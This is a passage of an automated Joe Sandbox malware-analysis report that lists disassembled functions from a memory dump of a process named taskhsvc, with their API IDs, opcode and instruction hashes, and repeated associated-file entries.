                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$S
                                                            • API String ID: 0-2375278349
                                                            • Opcode ID: bc4cd32eaf2a2cb3355f9c491ecb477e4495b25c9ef531cf4a9a1c5e85b8ff2e
                                                            • Instruction ID: 9a1aec01ee4f20a6629f5df9b393e294ff550566eb16847756f8fe0f67cf0724
                                                            • Opcode Fuzzy Hash: bc4cd32eaf2a2cb3355f9c491ecb477e4495b25c9ef531cf4a9a1c5e85b8ff2e
                                                            • Instruction Fuzzy Hash: 7721A17166A7118BDB109F25C1C066FB7F0AF64748F91582EDA948BB80DB30DC55CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CED4510 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_printf$O_ctrlO_mallocO_newO_s_file__stack_chk_fail
                                                            • String ID: j
                                                            • API String ID: 213212730-2137352139
                                                            • Opcode ID: 9c876ec898b1c19df56ffb42426a2dcf9b693b9d97ad5a057f76df31dd411723
                                                            • Instruction ID: a4611a8b34245ab9885265c179400a03da352af62f5fd8c33dba14041cb06500
                                                            • Opcode Fuzzy Hash: 9c876ec898b1c19df56ffb42426a2dcf9b693b9d97ad5a057f76df31dd411723
                                                            • Instruction Fuzzy Hash: F0214F756093008FD710DF69C18065BBBF0FF99358F26892EE9A997710D330E8058B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF0A570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Y_new
                                                            • String ID:
                                                            • API String ID: 4109228036-0
                                                            • Opcode ID: 64d6c8711e843052a98c81828f7d22e6310a6015c2014464ac3516631772be5f
                                                            • Instruction ID: f95ac71938631b80edb4a661d3204a9866bf94e40d801962cc6f7993c3fa4d2e
                                                            • Opcode Fuzzy Hash: 64d6c8711e843052a98c81828f7d22e6310a6015c2014464ac3516631772be5f
                                                            • Instruction Fuzzy Hash: B42117716097019FD700DF25D69061BBBF0BF84B58F128D2DE8A88BB00E375D4459F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF16C70 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_i2dN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1700296266-0
                                                            • Opcode ID: 5a000d9ff727250ddc937a8738f25f19d87fd6b766eaaed0418cd93362fc324e
                                                            • Instruction ID: 69e05d92a8e60971582225112bb16f4170ff725ccbcfde5785a599fc63950b73
                                                            • Opcode Fuzzy Hash: 5a000d9ff727250ddc937a8738f25f19d87fd6b766eaaed0418cd93362fc324e
                                                            • Instruction Fuzzy Hash: 2D211F75A186019FCB00EF39C68165BB7F1BB99308F469D1CE554CBB04E231AA158B86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF70E80 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 759496812-0
                                                            • Opcode ID: 50b749a4929c469e814d093ec7d7d94e7e8053d281d954bda02916c64aaf7eaf
                                                            • Instruction ID: e7894c278a480fa8f445c89d7cf8478e86f9a84334d32075b404cde295ebe661
                                                            • Opcode Fuzzy Hash: 50b749a4929c469e814d093ec7d7d94e7e8053d281d954bda02916c64aaf7eaf
                                                            • Instruction Fuzzy Hash: CF21E0716197409FCB50EF39C280A4FBBF0AB89318F46991CE5A4CB700D331E9098F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF16E10 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 759496812-0
                                                            • Opcode ID: ee7d581bb7fc78c1493c159187e9becec541eb6d741d739efa472004d6b2f9f0
                                                            • Instruction ID: 2f506a126e5771f862a9aaffa95825a45fe9a2f12540f478f5affb5b5e91e278
                                                            • Opcode Fuzzy Hash: ee7d581bb7fc78c1493c159187e9becec541eb6d741d739efa472004d6b2f9f0
                                                            • Instruction Fuzzy Hash: 2B217575A197419FCB50EF79C68164BBBF1AB89318F42991CE6A4CB704D330E9098F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF70D90 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2i__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 314559513-0
                                                            • Opcode ID: f8271e47ce0855b56c6d651d85c5384dd93e7ab52be13a619d2c86624660cd7c
                                                            • Instruction ID: cf1a4a07e8a6f7c3dc68bb1406cf4ce3203e451c0e76eb1fd5d8e5d2383be1ee
                                                            • Opcode Fuzzy Hash: f8271e47ce0855b56c6d651d85c5384dd93e7ab52be13a619d2c86624660cd7c
                                                            • Instruction Fuzzy Hash: 2721E3715096409FCB50EF39C28168FBBF1AB89318F56991CE6A4CBB04D331E9098F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEE2D40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: |$|
                                                            • API String ID: 1767461275-183604375
                                                            • Opcode ID: fed53c1b3ffbdb350bb7ba7ef29e6e7f5f205d400e50c356631216372efaba33
                                                            • Instruction ID: 3d700a7d70c53170774e7683b34867d47f70d5ce182092acc6533acd8160d7ed
